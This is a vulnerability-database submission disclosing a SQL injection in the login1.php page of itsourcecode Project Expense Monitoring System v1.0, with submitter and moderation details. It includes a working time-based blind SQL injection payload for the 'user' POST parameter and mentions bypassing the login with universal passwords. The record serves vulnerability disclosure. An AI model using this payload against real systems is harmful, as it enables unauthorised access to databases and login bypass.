| Title | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| Description | On the login1.php login authentication page, attackers can construct SQL statements to obtain sensitive information from the database and use universal passwords to log in to the backend.
POC:
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=admin' AND (SELECT 5289 FROM (SELECT(SLEEP(5)))cTae) AND 'rmay'='rmay&pass=123 |
|---|
| Source | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-1.md |
|---|
| User | GUOTINGTING (UID 73614) |
|---|
| Submission | 08/17/2024 14:13 (2 years ago) |
|---|
| Moderation | 08/19/2024 16:12 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 275118 [itsourcecode Project Expense Monitoring System 1.0 Backend Login login1.php User sql injection] |
|---|
| Points | 20 |
|---|